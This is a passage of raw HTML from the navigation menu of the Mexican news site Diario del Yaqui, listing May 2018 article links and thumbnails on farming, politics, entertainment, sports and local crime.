soya</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/mejora-genetica-de-ganado/' title='Mejora genética de ganado'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/rtrert-1-250x140.jpg" alt="Mejora genética de ganado" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 4 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/mejora-genetica-de-ganado/' title='Mejora genética de ganado'>Mejora genética de ganado</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/record-en-maiz/' title='Récord en maíz'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/rrxcbv-4-250x140.jpg" alt="Récord en maíz" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 20 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/record-en-maiz/' title='Récord en maíz'>Récord en maíz</a></h4></li></ul></li><!-- #cat-latest-76190 -->
<li id='cat-latest-76191' class=' cat-latest-76191'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76191' data-child_object_id='39'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/temen-a-secuelas-por-vacuna-vph/' title='Temen a secuelas por vacuna VPH'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-24-250x140.jpg" alt="Temen a secuelas por vacuna VPH" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/temen-a-secuelas-por-vacuna-vph/' title='Temen a secuelas por vacuna VPH'>Temen a secuelas por vacuna VPH</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/concursara-obregon-para-ciudad-creativa/' title='Concursará Obregón para Ciudad Creativa'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-23-250x140.jpg" alt="Concursará Obregón para Ciudad Creativa" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/concursara-obregon-para-ciudad-creativa/' title='Concursará Obregón para Ciudad Creativa'>Concursará Obregón para Ciudad Creativa</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/cae-nivel-de-oviachic-al-28-6/' title='Cae nivel de “Oviáchic” al 28.6%'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-25-250x140.jpg" alt="Cae nivel de “Oviáchic” al 28.6%" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/cae-nivel-de-oviachic-al-28-6/' title='Cae nivel de “Oviáchic” al 28.6%'>Cae nivel de “Oviáchic” al 28.6%</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/popote-flaquito-pero-muy-danino/' title='Popote: flaquito pero muy dañino'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/RRXCV-1-250x140.jpg" alt="Popote: flaquito pero muy dañino" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/popote-flaquito-pero-muy-danino/' title='Popote: flaquito pero muy dañino'>Popote: flaquito pero muy dañino</a></h4></li></ul></li><!-- #cat-latest-76191 -->
<li id='cat-latest-76192' class=' cat-latest-76192'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76192' data-child_object_id='42'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/ubican-inflacion-en-6-31-anual/' title='Ubican inflación en 6.31% anual'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/vpp-39-250x140.jpg" alt="Ubican inflación en 6.31% anual" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">24 mayo, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/ubican-inflacion-en-6-31-anual/' title='Ubican inflación en 6.31% anual'>Ubican inflación en 6.31% anual</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/cae-competitividad/' title='Cae competitividad'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ñpp-25-250x140.jpg" alt="Cae competitividad" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">23 mayo, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/cae-competitividad/' title='Cae competitividad'>Cae competitividad</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/estancada-la-lucha-contra-brecha-de-genero/' title='Estancada la lucha contra brecha de género'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ñpp-26-250x140.jpg" alt="Estancada la lucha contra brecha de género" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">23 mayo, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/estancada-la-lucha-contra-brecha-de-genero/' title='Estancada la lucha contra brecha de género'>Estancada la lucha contra brecha de género</a></h4></li><li class='no-thumb clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/hay-mas-peligros-ciberneticos-para-bancos/' title='Hay más peligros cibernéticos para Bancos'><img src="http://diariodelyaqui.mx/wp-content/themes/newscore/assets/images/placeholder-plain.gif" alt="Hay más peligros cibernéticos para Bancos" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">23 mayo, 2018</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/hay-mas-peligros-ciberneticos-para-bancos/' title='Hay más peligros cibernéticos para Bancos'>Hay más peligros cibernéticos para Bancos</a></h4></li></ul></li><!-- #cat-latest-76192 -->
<li id='cat-latest-76193' class=' cat-latest-76193'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76193' data-child_object_id='44'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/habra-debates-en-los-municipios/' title='Habrá debates en los municipios'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-14-250x140.jpg" alt="Habrá debates en los municipios" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/habra-debates-en-los-municipios/' title='Habrá debates en los municipios'>Habrá debates en los municipios</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/hasta-100-mil-pesos-usan-para-pagar-carrera/' title='Hasta 100 mil pesos usan para pagar carrera'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-12-250x140.jpg" alt="Hasta 100 mil pesos usan para pagar carrera" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/hasta-100-mil-pesos-usan-para-pagar-carrera/' title='Hasta 100 mil pesos usan para pagar carrera'>Hasta 100 mil pesos usan para pagar carrera</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/pension-oportuna/' title='Pensión oportuna'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-13-250x140.jpg" alt="Pensión oportuna" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/pension-oportuna/' title='Pensión oportuna'>Pensión oportuna</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/ven-en-asesinato-advertencia-politica/' title='Ven en asesinato advertencia política'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvvcbb-10-250x140.jpg" alt="Ven en asesinato advertencia política" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 5 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/ven-en-asesinato-advertencia-politica/' title='Ven en asesinato advertencia política'>Ven en asesinato advertencia política</a></h4></li></ul></li><!-- #cat-latest-76193 -->
<li id='cat-latest-76194' class=' cat-latest-76194'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76194' data-child_object_id='46'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/thalia-recuerda-a-su-madre-con-nostalgia/' title='Thalía recuerda a su  madre con nostalgia'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xcxv-2-250x140.jpg" alt="Thalía recuerda a su  madre con nostalgia" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/thalia-recuerda-a-su-madre-con-nostalgia/' title='Thalía recuerda a su  madre con nostalgia'>Thalía recuerda a su  madre con nostalgia</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/mi-verdadera-yo/' title='“Mi verdadera yo”'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xcxv-3-250x140.jpg" alt="“Mi verdadera yo”" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/mi-verdadera-yo/' title='“Mi verdadera yo”'>“Mi verdadera yo”</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/cristian-castro-recibe-demanda-por-maltrato-fisico-y-psicologico/' title='Cristian Castro recibe  demanda por maltrato  físico y psicológico'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xcxv-6-250x140.jpg" alt="Cristian Castro recibe  demanda por maltrato  físico y psicológico" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/cristian-castro-recibe-demanda-por-maltrato-fisico-y-psicologico/' title='Cristian Castro recibe  demanda por maltrato  físico y psicológico'>Cristian Castro recibe  demanda por maltrato  físico y psicológico</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/destrozan-en-redes-a-ana-barbara/' title='Destrozan  en redes a  Ana Bárbara'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xcxv-8-250x140.jpg" alt="Destrozan  en redes a  Ana Bárbara" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/destrozan-en-redes-a-ana-barbara/' title='Destrozan  en redes a  Ana Bárbara'>Destrozan  en redes a  Ana Bárbara</a></h4></li></ul></li><!-- #cat-latest-76194 -->
<li id='cat-latest-76195' class=' cat-latest-76195'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76195' data-child_object_id='48'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/amigas-se-van-de-paseo/' title='Amigas se  van de paseo'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xxcvrre-14-250x140.jpg" alt="Amigas se  van de paseo" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/amigas-se-van-de-paseo/' title='Amigas se  van de paseo'>Amigas se  van de paseo</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/jose-daniel-festeja-cumpleanos/' title='José Daniel festeja cumpleaños'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xxcvrre-12-250x140.jpg" alt="José Daniel festeja cumpleaños" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/jose-daniel-festeja-cumpleanos/' title='José Daniel festeja cumpleaños'>José Daniel festeja cumpleaños</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/regalos-para-bebe-en-camino-4/' title='Regalos para bebé en camino'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/q-17-250x140.jpg" alt="Regalos para bebé en camino" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/regalos-para-bebe-en-camino-4/' title='Regalos para bebé en camino'>Regalos para bebé en camino</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/concepcion-camarena-recorre-bella-italia/' title='Concepción Camarena  recorre “Bella Italia”'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/xxcvrre-6-250x140.jpg" alt="Concepción Camarena  recorre “Bella Italia”" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 3 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/concepcion-camarena-recorre-bella-italia/' title='Concepción Camarena  recorre “Bella Italia”'>Concepción Camarena  recorre “Bella Italia”</a></h4></li></ul></li><!-- #cat-latest-76195 -->
<li id='cat-latest-76196' class=' cat-latest-76196'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76196' data-child_object_id='41'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/cuba-modernizara-su-constitucion/' title='Cuba modernizará  su Constitución'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-18-250x140.jpg" alt="Cuba modernizará  su Constitución" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/cuba-modernizara-su-constitucion/' title='Cuba modernizará  su Constitución'>Cuba modernizará  su Constitución</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/sismo-en-china-dana-1500-casas/' title='Sismo en China daña 1,500 casas'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-17-250x140.jpg" alt="Sismo en China daña 1,500 casas" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/sismo-en-china-dana-1500-casas/' title='Sismo en China daña 1,500 casas'>Sismo en China daña 1,500 casas</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/el-pastor-de-eu-que-ayuda-a-50-menores-migrantes/' title='El pastor de EU que ayuda a 50 menores migrantes'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ujuvfghn-8-250x140.jpg" alt="El pastor de EU que ayuda a 50 menores migrantes" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 16 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/el-pastor-de-eu-que-ayuda-a-50-menores-migrantes/' title='El pastor de EU que ayuda a 50 menores migrantes'>El pastor de EU que ayuda a 50 menores migrantes</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/libera-caracas-a-pareja-de-eu/' title='Libera Caracas  a pareja de EU'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/qpp-27-250x140.jpg" alt="Libera Caracas  a pareja de EU" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 2 días</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/libera-caracas-a-pareja-de-eu/' title='Libera Caracas  a pareja de EU'>Libera Caracas  a pareja de EU</a></h4></li></ul></li><!-- #cat-latest-76196 -->
<li id='cat-latest-76197' class=' cat-latest-76197'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76197' data-child_object_id='40'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/solicitan-la-ficha-roja-contra-esposa-de-duarte/' title='Solicitan la “ficha roja” contra esposa de Duarte'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-10-250x140.jpg" alt="Solicitan la “ficha roja” contra esposa de Duarte" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/solicitan-la-ficha-roja-contra-esposa-de-duarte/' title='Solicitan la “ficha roja” contra esposa de Duarte'>Solicitan la “ficha roja” contra esposa de Duarte</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/suspenden-consignacion-de-caso-contra-barreiro/' title='Suspenden  consignación  de caso contra  Barreiro'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-8-250x140.jpg" alt="Suspenden  consignación  de caso contra  Barreiro" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/suspenden-consignacion-de-caso-contra-barreiro/' title='Suspenden  consignación  de caso contra  Barreiro'>Suspenden  consignación  de caso contra  Barreiro</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/asigna-epn-500-mdp-a-distritos-de-riego/' title='Asigna EPN 500 mdp a distritos de riego'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-34-250x140.jpg" alt="Asigna EPN 500 mdp a distritos de riego" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/asigna-epn-500-mdp-a-distritos-de-riego/' title='Asigna EPN 500 mdp a distritos de riego'>Asigna EPN 500 mdp a distritos de riego</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/ronda-a-campanas-el-lavado-de-dinero/' title='Ronda a campañas el “lavado” de dinero'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ujuvfghn-2-250x140.jpg" alt="Ronda a campañas el “lavado” de dinero" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 17 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/ronda-a-campanas-el-lavado-de-dinero/' title='Ronda a campañas el “lavado” de dinero'>Ronda a campañas el “lavado” de dinero</a></h4></li></ul></li><!-- #cat-latest-76197 -->
<li id='cat-latest-76198' class=' cat-latest-76198'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76198' data-child_object_id='43'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/' title='Medias Blancas cae ante Indios'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-8-250x140.jpg" alt="Medias Blancas cae ante Indios" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/medias-blancas-cae-ante-indios/' title='Medias Blancas cae ante Indios'>Medias Blancas cae ante Indios</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/' title='Lamentan salida de Valdeomillos de la Selección Nacional'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-12-250x140.jpg" alt="Lamentan salida de Valdeomillos de la Selección Nacional" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/lamentan-salida-de-valdeomillos-de-la-seleccion-nacional/' title='Lamentan salida de Valdeomillos de la Selección Nacional'>Lamentan salida de Valdeomillos de la Selección Nacional</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/' title='Habrá Jornada 17 de Futbol Veterano Municipal'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-9-250x140.jpg" alt="Habrá Jornada 17 de Futbol Veterano Municipal" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/habra-jornada-17-de-futbol-veterano-municipal/' title='Habrá Jornada 17 de Futbol Veterano Municipal'>Habrá Jornada 17 de Futbol Veterano Municipal</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/jornada-de-futbol-rapido/' title='Jornada de futbol rápido'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/fcbvcty-11-250x140.jpg" alt="Jornada de futbol rápido" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/jornada-de-futbol-rapido/' title='Jornada de futbol rápido'>Jornada de futbol rápido</a></h4></li></ul></li><!-- #cat-latest-76198 -->
<li id='cat-latest-76199' class=' cat-latest-76199'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76199' data-child_object_id='49'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/camionazo-en-navojoa/' title='Camionazo en Navojoa'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-10-250x140.jpg" alt="Camionazo en Navojoa" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/camionazo-en-navojoa/' title='Camionazo en Navojoa'>Camionazo en Navojoa</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/detenidos-con-armas-cortas/' title='Detenidos con armas cortas'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-12-250x140.jpg" alt="Detenidos con armas cortas" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/detenidos-con-armas-cortas/' title='Detenidos con armas cortas'>Detenidos con armas cortas</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/arrestan-a-marino/' title='Arrestan  a marino'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-6-250x140.jpg" alt="Arrestan  a marino" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/arrestan-a-marino/' title='Arrestan  a marino'>Arrestan  a marino</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/' title='Asesinan a uno y “levantan” a otro'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/cvxcv-7-250x140.jpg" alt="Asesinan a uno y “levantan” a otro" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 7 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/asesinan-a-uno-y-levantan-a-otro/' title='Asesinan a uno y “levantan” a otro'>Asesinan a uno y “levantan” a otro</a></h4></li></ul></li><!-- #cat-latest-76199 -->
<li id='cat-latest-76200' class=' cat-latest-76200'><ul class='large-block-grid-4  cat-tab-content cat-tab-content-76200' data-child_object_id='38'><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/alza-la-voz-cce-ante-inseguridad/' title='Alza la voz CCE  ante inseguridad'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/ssfzxz-13-250x140.jpg" alt="Alza la voz CCE  ante inseguridad" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 6 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/alza-la-voz-cce-ante-inseguridad/' title='Alza la voz CCE  ante inseguridad'>Alza la voz CCE  ante inseguridad</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/demanda-obregon-hospital-psiquiatrico/' title='Demanda Obregón hospital psiquiátrico'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/rrxxxcv-11-250x140.jpg" alt="Demanda Obregón hospital psiquiátrico" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 18 horas</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/demanda-obregon-hospital-psiquiatrico/' title='Demanda Obregón hospital psiquiátrico'>Demanda Obregón hospital psiquiátrico</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/arde-valle-del-yaqui-por-quema-de-gavilla/' title='Arde Valle del Yaqui por quema de gavilla'><img src="http://diariodelyaqui.mx/wp-content/uploads/2018/05/qpp-7-250x140.jpg" alt="Arde Valle del Yaqui por quema de gavilla" width="250" height="140"/></a></div><div class="entry-meta"><div class="date">Hace 2 días</div></div><div class="entry-extras"><div class="entry-featured">Destacado</div></div></div><h4 class='subcat-title'><a href='http://diariodelyaqui.mx/arde-valle-del-yaqui-por-quema-de-gavilla/' title='Arde Valle del Yaqui por quema de gavilla'>Arde Valle del Yaqui por quema de gavilla</a></h4></li><li class='has-thumbnail clearfix'><div class='subcat-thumbnail entry-content-media'><div class='post-thumb zoom-img-in'><a href='http://diariodelyaqui.mx/construyen-casa-con-paja-de-trigo/' title='Construyen casa con paja de 